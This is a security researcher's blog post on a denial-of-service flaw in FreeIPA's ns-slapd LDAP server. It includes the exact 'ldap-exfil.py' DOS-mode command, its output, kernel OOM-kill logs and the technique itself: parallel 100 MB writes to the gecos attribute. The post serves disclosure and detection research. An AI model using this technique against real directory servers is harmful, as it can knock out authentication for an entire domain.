Defensive Go back to all

Blog

FreeIPA Memory Exhaustion ns-slapd Remote DOS

- By Leszek Miś

FreeIPA is an Linux / Open Source alternative to Microsoft Active Directory solution. I like to call it as 'Linux Domain Controller'. It's great solution for Linux server environments where you are looking for centralized authentication, Kerberos Single-Sign-On or any other built-in network functionality from the list:

  • DNS
  • Kerberos
  • LDAP
  • NTP server
  • PKI
  • HBAC - Host-Based Access Control
  • SSH Public Key MGMT
  • Domain Trusts
  • HTTP server for hosting web management panel and API

If you are looking for fast deployment path of Kerberos-based Linux environment, then it's probably the easiest and the fastest way to play with. It's also worth mentioning that FreeIPA stack is fully enforced by SELinux policy.

All right, back to the main topic.

During security research, I found an easy way to remotely trigger an OOM killer kernel job against ns-slapd - the main process name of the 389 Directory Server and one of the most important processes of the FreeIPA stack. The Linux 'OOM killer' sacrifices one or more processes in order to free up memory for the system. You can find more about OOM here: https://linux-mm.org/OOM_Killer

I run a bunch of tests where FreeIPA was running:

  • inside VirtualBox VM @ desktop
  • inside KVM VM @ desktop
  • inside KVM VM @ dedicated bare-metal server connected to a 1Gb switch

Tests were carried out taking into the account changes in assigned RAM size for VM (2GB and 4 GB of RAM per VM).

In any case, the ns-slapd process has been killed by OOM shortly after I started a ldap-exfil.py script - sounds like Remote Denial of Service, right?

Details below:

[root@freeipa ~]# cat /etc/redhat-release
CentOS Linux release 7.6.1810 (Core)

[root@freeipa ~]# rpm -qa | grep ipa
python2-ipaserver-4.6.4-10.el7.centos.noarch
ipa-server-dns-4.6.4-10.el7.centos.noarch
ipa-common-4.6.4-10.el7.centos.noarch
ipa-client-common-4.6.4-10.el7.centos.noarch
python-ipaddress-1.0.16-2.el7.noarch
python2-ipaclient-4.6.4-10.el7.centos.noarch
ipa-client-4.6.4-10.el7.centos.x86_64
ipa-server-4.6.4-10.el7.centos.x86_64
ipa-server-common-4.6.4-10.el7.centos.noarch
sssd-ipa-1.16.2-13.el7.x86_64
python2-ipalib-4.6.4-10.el7.centos.noarch
libipa_hbac-1.16.2-13.el7.x86_64
python-libipa_hbac-1.16.2-13.el7.x86_64
python-iniparse-0.4-9.el7.noarch

[root@freeipa ~]# rpm -qa | grep 389
389-ds-base-libs-1.3.8.4-18.el7_6.x86_64
389-ds-base-1.3.8.4-18.el7_6.x86_64

The system literally does not do anything:

[root@freeipa # top -p $(pidof ns-slapd)
top - 03:17:28 up 49 min, 2 users, load average: 0.07, 0.16, 0.15
Tasks: 1 total, 0 running, 1 sleeping, 0 stopped, 0 zombie
%Cpu(s): 0.0 us, 0.3 sy, 0.0 ni, 99.7 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 2047164 total, 219388 free, 1012848 used, 814928 buff/cache
KiB Swap: 1998844 total, 1998580 free, 264 used. 816324 avail Mem

PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
3606 dirsrv 20 0 721044 84636 32420 S 0.7 4.1 0:19.50 ns-slapd


For a test case I've already created a testing 'enet' user:

[root@freeipa ~]# kinit admin
[root@freeipa ~]# ipa user-find enet
--------------
1 user matched
--------------
User login: enet
First name: exfil
Last name: net
Home directory: /home/enet
Login shell: /bin/sh
Principal name: enet@LAB.VM
Principal alias: enet@LAB.VM
Email address: enet@lab.vm
UID: 633800001
GID: 633800001
Account disabled: False
----------------------------
Number of entries returned 1
----------------------------

Now, let's try to run a DOS mode of the ldap-exfil.py script (the get / set mode will be covered on the next blog post)

# python ldap-exfil.py --server ldap://192.168.56.10:389 -d uid=enet,cn=users,cn=accounts,dc=lab,dc=vm -a gecos -m dos -p 'lolipop123'

*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
*** Size: [ 104858216 ] bytes
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))
('*** ERROR', SERVER_DOWN({'desc': "Can't contact LDAP server"},))

[root@freeipa ~]# dmesg
[ 2169.564589] Call Trace:
[ 2169.564598] [<ffffffff9e961e41>] dump_stack+0x19/0x1b
[ 2169.564601] [<ffffffff9e95c86a>] dump_header+0x90/0x229
[ 2169.564605] [<ffffffff9e500bcb>] ? cred_has_capability+0x6b/0x120
[ 2169.564609] [<ffffffff9e3ba4e4>] oom_kill_process+0x254/0x3d0
[ 2169.564612] [<ffffffff9e500cae>] ? selinux_capable+0x2e/0x40
[ 2169.564614] [<ffffffff9e3bad26>] out_of_memory+0x4b6/0x4f0
[ 2169.564617] [<ffffffff9e95d36e>] __alloc_pages_slowpath+0x5d6/0x724
[ 2169.564620] [<ffffffff9e3c1105>] __alloc_pages_nodemask+0x405/0x420
[ 2169.564624] [<ffffffff9e40df68>] alloc_pages_current+0x98/0x110
[ 2169.564626] [<ffffffff9e3b6347>] __page_cache_alloc+0x97/0xb0
[ 2169.564629] [<ffffffff9e3b8fa8>] filemap_fault+0x298/0x490
[ 2169.564660] [<ffffffffc0226d0e>] __xfs_filemap_fault+0x7e/0x1d0 [xfs]
[ 2169.564664] [<ffffffff9e2c2dc0>] ? wake_bit_function+0x40/0x40
[ 2169.564678] [<ffffffffc0226f0c>] xfs_filemap_fault+0x2c/0x30 [xfs]
[ 2169.564682] [<ffffffff9e3e444a>] __do_fault.isra.59+0x8a/0x100
[ 2169.564685] [<ffffffff9e3e49fc>] do_read_fault.isra.61+0x4c/0x1b0
[ 2169.564687] [<ffffffff9e3e93a4>] handle_pte_fault+0x2f4/0xd10
[ 2169.564689] [<ffffffff9e3ebedd>] handle_mm_fault+0x39d/0x9b0
[ 2169.564692] [<ffffffff9e96f5e3>] __do_page_fault+0x203/0x500
[ 2169.564694] [<ffffffff9e96f915>] do_page_fault+0x35/0x90
[ 2169.564697] [<ffffffff9e96ba96>] ? error_swapgs+0xa7/0xbd
[ 2169.564699] [<ffffffff9e96b758>] page_fault+0x28/0x30
[ 2169.564701] Mem-Info:
[ 2169.564706] active_anon:352087 inactive_anon:117920 isolated_anon:0
active_file:152 inactive_file:2153 isolated_file:0
unevictable:0 dirty:0 writeback:0 unstable:0
slab_reclaimable:4261 slab_unreclaimable:7628
mapped:92 shmem:7 pagetables:6833 bounce:0
free:13241 free_pcp:30 free_cma:0
[ 2169.564710] Node 0 DMA free:8264kB min:348kB low:432kB high:520kB active_anon:3124kB inactive_anon:3236kB active_file:0kB inactive_file:488kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15992kB managed:15908kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:220kB slab_unreclaimable:152kB kernel_stack:32kB pagetables:320kB unstable:0kB bounce:0kB free_pcp:0kB local_pcp:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:1892 all_unreclaimable? yes
[ 2169.564716] lowmem_reserve[]: 0 1980 1980 1980
[ 2169.564719] Node 0 DMA32 free:44700kB min:44704kB low:55880kB high:67056kB active_anon:1405224kB inactive_anon:468444kB active_file:608kB inactive_file:8124kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080704kB managed:2031256kB mlocked:0kB dirty:0kB writeback:0kB mapped:368kB shmem:28kB slab_reclaimable:16824kB slab_unreclaimable:30360kB kernel_stack:5280kB pagetables:27012kB unstable:0kB bounce:0kB free_pcp:120kB local_pcp:120kB free_cma:0kB writeback_tmp:0kB pages_scanned:10243 all_unreclaimable? yes
[ 2169.564725] lowmem_reserve[]: 0 0 0 0
[ 2169.564728] Node 0 DMA: 8*4kB (UE) 7*8kB (UEM) 1*16kB (U) 5*32kB (UM) 1*64kB (U) 2*128kB (U) 2*256kB (EM) 2*512kB (UE) 2*1024kB (EM) 2*2048kB (UM) 0*4096kB = 8264kB
[ 2169.564740] Node 0 DMA32: 1053*4kB (UE) 723*8kB (UEM) 295*16kB (UE) 153*32kB (UEM) 78*64kB (UE) 37*128kB (U) 24*256kB (U) 16*512kB (UM) 1*1024kB (U) 0*2048kB 0*4096kB = 44700kB
[ 2169.564751] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[ 2169.564752] 2643 total pagecache pages
[ 2169.564754] 303 pages in swap cache
[ 2169.564756] Swap cache stats: add 824115, delete 823812, find 158440/179214
[ 2169.564757] Free swap = 0kB
[ 2169.564758] Total swap = 1998844kB
[ 2169.564759] 524174 pages RAM
[ 2169.564760] 0 pages HighMem/MovableOnly
[ 2169.564761] 12383 pages reserved
[ 2169.564762] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name
[ 2169.564774] [ 1411] 0 1411 10057 1 23 106 0 systemd-journal
[ 2169.564776] [ 1437] 0 1437 31837 0 29 712 0 lvmetad
[ 2169.564779] [ 1453] 0 1453 11887 1 27 546 -1000 systemd-udevd
[ 2169.564783] [ 2560] 0 2560 15511 4 28 152 -1000 auditd
[ 2169.564785] [ 2583] 999 2583 156313 0 66 2031 0 polkitd
[ 2169.564788] [ 2584] 81 2584 19720 93 36 108 -900 dbus-daemon
[ 2169.564791] [ 2585] 32 2585 18412 0 38 190 0 rpcbind
[ 2169.564794] [ 2592] 0 2592 64339 5 78 330 0 sssd
[ 2169.564796] [ 2598] 0 2598 89548 0 95 5527 0 firewalld
[ 2169.564798] [ 2602] 0 2602 69413 0 48 203 0 gssproxy
[ 2169.564801] [ 2610] 0 2610 11714 0 26 140 0 rpc.gssd
[ 2169.564803] [ 2611] 0 2611 99294 16 136 648 0 sssd_be
[ 2169.564806] [ 2612] 0 2612 59550 21 71 198 0 sssd_sudo
[ 2169.564808] [ 2613] 0 2613 66242 20 84 214 0 sssd_nss
[ 2169.564811] [ 2614] 0 2614 59037 22 71 202 0 sssd_ifp
[ 2169.564813] [ 2615] 0 2615 61158 22 76 204 0 sssd_pam
[ 2169.564815] [ 2616] 0 2616 58985 22 71 191 0 sssd_ssh
[ 2169.564818] [ 2617] 0 2617 69110 21 87 295 0 sssd_pac
[ 2169.564821] [ 2618] 0 2618 6594 23 17 52 0 systemd-logind
[ 2169.564823] [ 2622] 0 2622 31572 0 20 160 0 crond
[ 2169.564826] [ 2646] 0 2646 27523 0 10 33 0 agetty
[ 2169.564828] [ 2647] 0 2647 118940 39 86 968 0 NetworkManager
[ 2169.564831] [ 3113] 0 3113 143456 127 99 2668 0 tuned
[ 2169.564833] [ 3114] 0 3114 28189 0 58 257 -1000 sshd
[ 2169.564835] [ 3116] 0 3116 13179 0 30 105 0 oddjobd
[ 2169.564838] [ 3117] 0 3117 24340 1 52 312 0 certmonger
[ 2169.564840] [ 3119] 0 3119 54102 1 42 666 0 rsyslogd
[ 2169.564842] [ 3371] 0 3371 22907 0 44 262 0 master
[ 2169.564845] [ 3377] 89 3377 25474 0 47 254 0 pickup
[ 2169.564847] [ 3378] 89 3378 25491 0 45 256 0 qmgr
[ 2169.564849] [ 3392] 0 3392 43276 31 84 317 0 sshd
[ 2169.564852] [ 3524] 0 3524 28860 1 14 96 0 bash
[ 2169.564854] [ 3617] 995 3617 1011302 457215 1678 306673 0 ns-slapd
[ 2169.564857] [ 3651] 0 3651 66785 0 79 482 0 krb5kdc
[ 2169.564859] [ 3657] 0 3657 67578 1 82 2562 0 kadmind
[ 2169.564861] [ 3667] 25 3667 99885 0 112 15558 0 named-pkcs11
[ 2169.564864] [ 3678] 0 3678 107169 34 179 2413 0 httpd
[ 2169.564866] [ 3680] 0 3680 8708 0 23 110 0 nss_pcache
[ 2169.564869] [ 3683] 994 3683 172203 0 197 3696 0 httpd
[ 2169.564871] [ 3684] 994 3684 155819 0 196 3694 0 httpd
[ 2169.564874] [ 3685] 993 3685 181458 528 287 19997 0 httpd
[ 2169.564876] [ 3686] 993 3686 197842 527 288 19999 0 httpd
[ 2169.564878] [ 3687] 993 3687 181458 528 287 19997 0 httpd
[ 2169.564881] [ 3688] 993 3688 181458 528 287 19997 0 httpd
[ 2169.564883] [ 3689] 48 3689 113725 6 163 3058 0 httpd
[ 2169.564885] [ 3690] 48 3690 113725 6 163 3058 0 httpd
[ 2169.564888] [ 3691] 48 3691 113725 6 163 3058 0 httpd
[ 2169.564890] [ 3692] 48 3692 113725 6 163 3058 0 httpd
[ 2169.564892] [ 3693] 48 3693 113725 15 163 3052 0 httpd
[ 2169.564895] [ 3696] 0 3696 83148 128 118 5859 0 ipa-custodia
[ 2169.564897] [ 3764] 38 3764 10547 32 21 124 0 ntpd
[ 2169.564899] [ 3913] 17 3913 666454 7265 182 31326 0 java
[ 2169.564902] [ 4058] 997 4058 132210 1 201 19581 0 ipa-dnskeysyncd
[ 2169.564904] [ 4103] 0 4103 40437 60 36 76 0 top
[ 2169.564906] Out of memory: Kill process 3617 (ns-slapd) score 756 or sacrifice child
[ 2169.565231] Killed process 3617 (ns-slapd) total-vm:4045208kB, anon-rss:1828860kB, file-rss:0kB, shmem-rss:0kB

Basically, the script spawns 10 processes in paraller. Every process sends a 1024*1024*100 bytes of base64-encoded string and saves it directly into the LDAP gecos attribute, thus generates a high number of ldap.MOD_REPLACE operations and high RAM consumption in the end. The ns-slapd process memory swells, and finally blows up. You can see how the memory usage grows in seconds - check out a short youtube demo below:

From my perspective, it's clearly a low/medium severity score vulnerability that could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system. It is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by sending a malicious LDAP requests to the LDAP server which can cause a service disruption for the whole domain env or can be a part of chained attack where attacker wants to possibly log in to the system by using local credentials rather than domain ones - which is potentially possible after killing the ns-slapd.


I was in touch with Red Hat Security Team regarding this vulnerability, however, they were not able to reproduce the behavior. I am wondering if someone from the community could try to run the test and give some feedback - that would be awesome. I run the test many times during the research and training sessions as well - with 100% efficiency. Every time the ns-slapd process was killed at once.

In the next blog post, I will cover how to run a detection of such behavior from network perspective by using BRO IDS and LDAP analyzer. Re-share, re-tweet if you enjoy.

Links:

Leszek Mis @ Defensive-security.com